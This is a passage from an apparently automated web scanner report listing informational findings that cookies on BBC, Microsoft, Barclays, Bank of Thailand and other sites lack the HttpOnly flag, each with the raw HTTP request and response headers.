Set-Cookie: BBC-UID=34cd4c40409250f8085ec3c921c41698c30a233970c08233975d83f5e6c1d5460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...

16.120. http://news.bbc.co.uk/sport2/hi/football/13265403.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:24 GMT
Keep-Alive: timeout=10, max=800
Expires: Tue, 03 May 2011 13:24:24 GMT
Connection: close
Set-Cookie: BBC-UID=643d9c10a0c2d0e8ac0f3690915614f23faa777440c021292beb63de88eda35a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=643d9c10a0c2d0e8ac0f3690915614f23faa777440c021292beb63de88eda35a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...

16.121. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:26 GMT
Keep-Alive: timeout=10, max=795
Expires: Tue, 03 May 2011 13:24:26 GMT
Connection: close
Set-Cookie: BBC-UID=64cd0c50202200caeed98baf71322f665e5ca9bb10f0c18a64cbfae4b0dcf6520Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64cd0c50202200caeed98baf71322f665e5ca9bb10f0c18a64cbfae4b0dcf6520Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...

16.122. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808506.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-US/bing/ff808506.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAADwBwAA5EE5dH9H4z1ekNaveklkZg!!&M=1; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:11 GMT; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:11 GMT; path=/
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 03-May-2041 13:23:11 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:23:11 GMT
Content-Length: 34326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Explore the
...[SNIP]...

16.123. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-US/bing/ff808535.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAADoBwAAQxKyg25PAhSZatiXmLSAdw!!&M=1; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:17 GMT; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:17 GMT; path=/
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/; expires=Fri, 03-May-2041 13:23:17 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:23:16 GMT
Content-Length: 37037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bing Help
<
...[SNIP]...

16.124. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102301%3Ats%3D1304431102301; Domain=.33across.com; Expires=Wed, 02-May-2012 13:58:22 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Tue, 03 May 2011 13:58:21 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

16.125. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://propertyforsale.kasikornbank.com
Path:   /PropertyForSaleAnnouncement/1,2098,,00.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PropertyForSaleAnnouncement/1,2098,,00.html HTTP/1.1
Host: propertyforsale.kasikornbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:20:37 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: vgnvisitor=5-GEM0001rg000Ykjs019nQ3d6; path= /; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Set-Cookie: checkPropertyAnnouncement=Y2hlY2tQcm9wZXJ0eUFubm91bmNlbWVudA==; path=/
Content-Type: text/html


<!-- Vignette V/5 Tue May 03 20:20:37 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.o
...[SNIP]...

16.126. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scriptlogiccorp.d2.sc.omtrdc.net
Path:   /b/ss/slcproduction/1/H.22.1/s27267301290655

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/slcproduction/1/H.22.1/s27267301290655?AQB=1&ndh=1&t=3%2F4%2F2011%2013%3A31%3A55%202%20300&ce=UTF-8&ns=scriptlogiccorp&pageName=landing%3Egoogle%3Epackettrapit%3Ewireless&g=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpackettrapit%2Fwireless.asp%3Fsrc%3Dcps11%3Fs_kwcid%3DTC%7C14898%7Cwireless%2520network%2520strength%2520monitor%7Cformlessnetworking.com%7CC%7C%7C7322411534&r=http%3A%2F%2Fwww.sedoparking.com%2Fsearch%2Fregistrar.php%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking.com&cc=USD&ch=landing&server=www.scriptlogic.com&c1=google&c2=packettrapit&c3=wireless&v3=landing%3Egoogle%3Epackettrapit%3Ewireless&c8=Guest&v8=Guest&c9=New&v9=New&v10=1&c12=2%3A30PM&v12=2%3A30PM&c13=Tuesday&v13=Tuesday&c14=Weekday&v14=Weekday&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=852&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: scriptlogiccorp.d2.sc.omtrdc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:43:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E0033C051D25E5-40000101E00031B6[CE]; Expires=Sun, 1 May 2016 13:43:20 GMT; Domain=scriptlogiccorp.d2.sc.omtrdc.net; Path=/
Location: http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655?AQB=1&pccr=true&vidn=26E0033C051D25E5-40000101E00031B6&&ndh=1&t=3%2F4%2F2011%2013%3A31%3A55%202%20300&ce=UTF-8&ns=scriptlogiccorp&pageName=landing%3Egoogle%3Epackettrapit%3Ewireless&g=http%3A%2F%2Fwww.scriptlogic.com%2Flanding%2Fgoogle%2Fpackettrapit%2Fwireless.asp%3Fsrc%3Dcps11%3Fs_kwcid%3DTC%7C14898%7Cwireless%2520network%2520strength%2520monitor%7Cformlessnetworking.com%7CC%7C%7C7322411534&r=http%3A%2F%2Fwww.sedoparking.com%2Fsearch%2Fregistrar.php%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking.com&cc=USD&ch=landing&server=www.scriptlogic.com&c1=google&c2=packettrapit&c3=wireless&v3=landing%3Egoogle%3Epackettrapit%3Ewireless&c8=Guest&v8=Guest&c9=New&v9=New&v10=1&c12=2%3A30PM&v12=2%3A30PM&c13=Tuesday&v13=Tuesday&c14=Weekday&v14=Weekday&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=852&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 02 May 2011 13:43:20 GMT
Last-Modified: Wed, 04 May 2011 13:43:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www15
Content-Length: 0
Content-Type: text/plain


16.127. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.bot.or.th
Path:   /dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif?dcsredirect=1&dcsdat=1304441056515&dcssip=www.bot.or.th&dcsuri=/english/Pages/BOTDefault.aspx&WT.tz=-5&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Bank%20of%20Thailand&WT.js=Yes&WT.jv=1.5&WT.bs=1059x903&WT.fi=Yes&WT.fv=10.2&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-1855903296.30148999.1304441056517&WT.co_f=173.193.214.243-1855903296.30148999 HTTP/1.1
Host: sdc.bot.or.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WEBTRENDS_ID=173.193.214.243-1855903296.30148999; _cbclose=1; _cbclose6672=1; _uid6672=8A158878.1; _ctout6672=1

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 05:00:42 GMT
Accept-Ranges: bytes
ETag: "079688e7560c71:528"
Server: Microsoft-IIS/6.0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xODU1OTAzMjk2LjMwMTQ4OTk5AAAAAAABAAAAAQAAAJPqv02T6r9NAQAAAAEAAACT6r9Nk+q/TQAAAAA-; path=/; expires=Fri, 30-Apr-2021 11:44:19 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 03 May 2011 11:44:19 GMT
Connection: close

GIF89a.............!.......,...........D..;

16.128. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.bot.or.th
Path:   /dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif?&dcsdat=1304441056515&dcssip=www.bot.or.th&dcsuri=/english/Pages/BOTDefault.aspx&WT.tz=-5&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Bank%20of%20Thailand&WT.js=Yes&WT.jv=1.5&WT.bs=1059x903&WT.fi=Yes&WT.fv=10.2&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-1855903296.30148999.1304441056517&WT.co_f=173.193.214.243-1855903296.30148999 HTTP/1.1
Host: sdc.bot.or.th
Proxy-Connection: keep-alive
Referer: http://www.bot.or.th/english/Pages/BOTDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose6672=1; _uid6672=8A158878.1; _ctout6672=1

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Tue, 03 May 2011 11:44:18 GMT
Server: Microsoft-IIS/6.0
Location: /dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif?dcsredirect=1&dcsdat=1304441056515&dcssip=www.bot.or.th&dcsuri=/english/Pages/BOTDefault.aspx&WT.tz=-5&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Bank%20of%20Thailand&WT.js=Yes&WT.jv=1.5&WT.bs=1059x903&WT.fi=Yes&WT.fv=10.2&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=173.193.214.243-1855903296.30148999.1304441056517&WT.co_f=173.193.214.243-1855903296.30148999
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1855903296.30148999; expires=Fri, 30-Apr-2021 11:44:18 GMT; path=/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


16.129. http://statse.webtrendslive.com/dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif?&dcsdat=1304436046637&dcssip=group.barclays.com&dcsuri=/Home&WT.co_f=22a3393bfe12a9f24e71304454046661&WT.vtid=22a3393bfe12a9f24e71304454046661&WT.vtvs=1304436046661&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Barclays.com%20-%20Home&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1059x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ssl=0&WT.es=group.barclays.com/Home&WT.cg_n=Homepage&WT.cg_s=Home&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAANAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AADdFv003Rb9Nf8kAADRUv00zVL9NI8sAAF5Vv01AVL9NDAAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAAA3Rb9NN0W/TRpKAABeVb9NM1S/TQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Tue, 03 May 2011 10:20:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsbkflpo00000kz4nrnh3kyv_9q5r/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1304436046637&dcssip=group.barclays.com&dcsuri=/Home&WT.co_f=22a3393bfe12a9f24e71304454046661&WT.vtid=22a3393bfe12a9f24e71304454046661&WT.vtvs=1304436046661&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Barclays.com%20-%20Home&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1059x903&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ssl=0&WT.es=group.barclays.com/Home&WT.cg_n=Homepage&WT.cg_s=Home&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAOAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AADdFv003Rb9Nf8kAADRUv00zVL9NI8sAAF5Vv01AVL9NPKoAAADXv00A179NDQAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAAA3Rb9NN0W/TRpKAABeVb9NM1S/Te1BAAAA179NANe/TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


16.130. http://statse.webtrendslive.com/dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif?&dcsdat=1304436124374&dcssip=apps.barclays.co.uk&dcsuri=/accessibility/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Barclays%20Accessibility&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1059x903&WT.fi=Yes&WT.fv=10.2&WT.tv=8.0.2&WT.vt_f_tlh=1304436099&WT.vt_sid=2e6a8286f3ae7c7522a1304421997884.1304436071727&WT.co_f=2e6a8286f3ae7c7522a1304421997884 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://apps.barclays.co.uk/accessibility/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAOAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AADdFv003Rb9Nf8kAADRUv00zVL9NI8sAAF5Vv01AVL9NPKoAAEzXv00A179NDQAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAAA3Rb9NN0W/TRpKAABeVb9NM1S/Te1BAABM179NANe/TQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Tue, 03 May 2011 10:22:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcssxcr8i00000stlemt7jpvp_8c9t/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1304436124374&dcssip=apps.barclays.co.uk&dcsuri=/accessibility/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Barclays%20Accessibility&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1059x903&WT.fi=Yes&WT.fv=10.2&WT.tv=8.0.2&WT.vt_f_tlh=1304436099&WT.vt_sid=2e6a8286f3ae7c7522a1304421997884.1304436071727&WT.co_f=2e6a8286f3ae7c7522a1304421997884
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAPAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNN/QAAC3mvU3q5b1N98wAAAaovk0EqL5N9foAAGHwvk1e8L5NY88AADdFv003Rb9Nf8kAADRUv00zVL9NI8sAAF5Vv01AVL9NPKoAAEzXv00A179N86YAAEzXv01M179NDQAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TbJPAAAt5r1N6uW9TWVJAAAGqL5NBKi+TU5QAABh8L5NXvC+TRRLAAA3Rb9NN0W/TRpKAABeVb9NM1S/Te1BAABM179NANe/TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


16.131. http://tc.barclays.co.uk/Creditcards/P1242557963445  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tc.barclays.co.uk
Path:   /Creditcards/P1242557963445

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Creditcards/P1242557963445 HTTP/1.1
Host: tc.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
